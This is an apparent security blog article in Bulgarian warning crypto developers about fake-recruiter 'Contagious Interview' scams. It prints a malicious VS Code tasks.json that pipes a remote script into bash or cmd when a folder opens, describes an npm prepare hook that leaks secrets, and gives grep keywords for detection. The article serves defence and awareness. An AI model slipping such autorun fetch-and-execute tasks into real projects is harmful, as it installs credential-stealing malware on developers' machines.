Security
tradingmaster-ai-sentinel
Написано от
TradingMaster AI Sentinel
6 мин четене

Заразно Интервю: Как фалшиви рекрутъри хакват разработчици

Заразно Интервю (Contagious Interview): Как фалшиви рекрутъри хакват разработчици

Резюме: Нова вълна от спонсорирани от държавата атаки удря най-добрите крипто разработчици. Измамниците се представят за рекрутъри или CTO и принуждават кандидатите да отворят зловреден код. Тази статия разглежда случая „Martin Erazo“, експлойта VS Code „tasks.json“ и „Протокола за Изгаряне“, необходим за оцеляване.

Отказ от отговорност: Тази статия цитира инциденти с киберсигурността, при които се използват фалшиви самоличности на реални хора. Имената "Martin Erazo" и "Ara Vartanian" се отнасят за персоните, използвани от атакуващите. Вярваме, че реалните хора зад тези имена са невинни жертви на кражба на самоличност.



1. Перфектната Жертва: Персоната "Martin Erazo"

Започва със съобщение, което натиска всички правилни бутони за един Senior Dev:

  • Роля: CTO / Lead Architect
  • Бюджет: $6M осигурено финансиране
  • Tech: Web3, AI, Децентрализирана Инфраструктура

В наскоро потвърдена атака, рекрутър на име „Martin Erazo“ се свързва чрез LinkedIn. Профилът използва името и снимката на истински театрален режисьор, но трудовата история е фалшива и внезапно се променя на „IT Project Management“ през 2025 г. - класически знак за компрометиран или купен акаунт.

Измамата се развива бързо. Пропускат типичния HR скрининг и отиват направо на „Техническо Интервю“ със старши ръководител - в този случай имитация на истинския индустриален CTO Ara Vartanian (понастоящем в Limit Break).

Червен Флаг: Имената на проектите се променят постоянно. Рекрутърът продава „Betfin“ (GameFi платформа), но изпратената презентация е за „SpaceXView“ (Metaverse проект). Това несъответствие е улика, че измамниците рециклират активи между кампаниите.

Social Engineering Recruiter vs Hacker

2. Капанът: „Можете ли да прегледате нашия MVP код?“

Фалшивият „CTO“ твърди, че имат нужда от вашите експертни очи, за да проверите MVP (Minimum Viable Product) кода. Изпращат линк към GitHub Repo или ZIP файл и ви притискат да го отворите по време на интервюто или веднага след него.

Тук се случва хакът.

Те използват желанието ви да помогнете и егото ви. Мислите, че търсите бъг в React компонент. В действителност "бъгът" е "функция", предназначена да открадне спестяванията ви.

3. Техническото Проникване: Zero-Click Malware

Атакуващите използват „zero-click“ или „low-click“ експлойти, насочени към инструментите за разработчици. Не е нужно да стартирате приложението; простото отваряне на папката е достатъчно.

Оръжието: .vscode/tasks.json

В този конкретен случай, репото съдържаше заразен .vscode/tasks.json файл. Този файл казва на VS Code как да изгради проекта.

Зловреден Код:

{
  "tasks": [
    {
      "label": "env",
      "type": "shell",
      "osx": {
        "command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
      },
      "windows": {
        "command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
      },
      "runOptions": {
        "runOn": "folderOpen"
      }
    }
  ]
}
  • "runOn": "folderOpen": Това е спусъкът. Веднага щом отворите папката във VS Code, тази задача се стартира автоматично.
  • Payload: Използва curl за изтегляне на скрипт от vscodesettingtask.vercel.app - известен хост на зловреден софтуер, маскиран като API за настройки.
  • Резултат: Скриптът работи в паметта и незабавно краде пароли за Chrome, сесийни бисквитки и SSH ключове.

План Б: package.json scripts

Ако хакът на VS Code се провали, те имат npm скриптове:

"scripts": {
    "start": "node server/server.js | react-scripts start",
    "prepare": "node server/server.js"
}

Изпълнението на npm install или npm start задейства server/server.js - локален C2 (Command and Control) скрипт, който изтича променливи на средата (AWS ключове, сийдове на портфейла) към нападателя.

4. Червени Флагове срещу Зелени Флагове

Как да забележите това, преди да е станало твърде късно?

Ако сте разработчик, „Частни Репа“ (Private Repos) или ZIP файлове трябва да задействат аларми от високо ниво. Легитимните компании използват Публични Репа или стандартизирани платформи за тестване.

Предупреждение: Това не е единственият път за атака срещу разработчици. Прочетете за Капана на Сътрудника в Discord и как Атаките на Веригата за Доставки правят зависимостите опасни.

🚩 Червен Флаг (Бягай)✅ Зелен Флаг (Безопасно)
Код Първо: Изпращат код преди оферта за работаСтандартен Процес: Първо интервю, после код
Счупена Самоличност: Рекрутърът има несвързано минало (напр. Артист -> IT Мениджър)Проверена История: Кариерата в LinkedIn е последователна
Несъответствие: Имената на проектите не съвпадат (Betfin vs SpaceXView)Последователност: Име, документация и сайт съвпадат
Спешност: „CTO чака“, „отворете сега“Търпение: Уважават вашето време и график
Личен Имейл: [email protected]Корпоративен Имейл: [email protected] (с работещи MX записи)

5. Протокол за Сигурност: Как да интервюирате безопасно

Ако сте Senior Dev, ще ви ловуват. Закаляването на вашата среда е задължително.

Протокол 1: "Burner" Среда

Никога не използвайте основната си работна станция за тестове на код.

  • Виртуални Машини: Използвайте VirtualBox или VMWare.
  • Cloud Dev Среди: Използвайте GitHub Codespaces или Gitpod. Те са ефимерни и изолирани от вашите локални файлове на портфейла.

Протокол 2: Форензичен Одит

Преди да отворите непознат код:

  1. Проверете .vscode/tasks.json: Търсете runOn: folderOpen.
  2. Проверете package.json: Търсете съмнителни preinstall или postinstall скриптове.
  3. Ключови думи: grep за curl, wget, os.homedir(), .ssh, wallet.

Протокол 3: Закаляване на VS Code

Деактивирайте „Workspace Trust“ глобално.

  • Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always
  • Това принуждава VS Code да иска разрешение преди да стартира задачи на ниво папка.

VS Code Hardening Shield

6. Решението: „Протокол за Изгаряне“ (Burn Protocol)

Ако сте отворили злонамерено Репо (като изпратеното от персоната „Martin Erazo“), приемете, че сте компрометирани. Нулирането не е достатъчно.

  1. Прекъсване на връзката: Издърпайте мрежовия кабел незабавно.
  2. Изгорете Портфейлите: Вашите Частни Ключове са изтекли. Създайте нови портфейли на чисто устройство (телефон) и преместете оставащите средства. Никога не използвайте повторно стария сийд.
  3. Убийте Сесиите: Излезте от всички сесии в Google, GitHub, AWS. Активно отменете токените.
  4. Проверка на SSH Ключ: Проверете настройките на GitHub/GitLab. Атакуващите често добавят свои SSH ключове, за да поддържат достъп през задната врата. Изтрийте всичко, което не разпознавате.
  5. Nuke It: Изтрийте диска и преинсталирайте операционната система. Това е единственият начин да сте 100% сигурни, че Rootkit-овете са изчезнали.

Заключение

Измамата „Заразно Интервю“ използва вашата собствена експертиза срещу вас. Тя се прицелва във вашето желание да решавате проблеми. Но в Web3, параноята е професионална добродетел. Проверявайте всяка самоличност, изолирайте всяко репо и никога не се доверявайте на „рекрутър“, който бърза да ви накара да стартирате код.

Готови ли сте да използвате знанията си?

Започнете да търгувате с увереност, задвижвана от AI, днес

Започнете

Инструменти за достъпност и четене